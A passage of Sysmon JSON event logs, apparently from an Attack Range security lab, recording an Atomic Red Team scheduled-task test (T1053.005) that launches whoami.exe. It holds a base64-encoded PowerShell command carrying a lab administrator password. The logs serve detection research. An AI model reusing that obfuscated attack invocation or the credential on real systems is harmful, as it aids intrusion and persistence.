WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.425","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-0010E54C0800}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","ParentProcessId":"4848","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010E54C0800}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983c2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978646a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9786423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010E54C0800}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983c2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978646a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9786423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010E54C0800}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010E54C0800}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5634,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5636,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 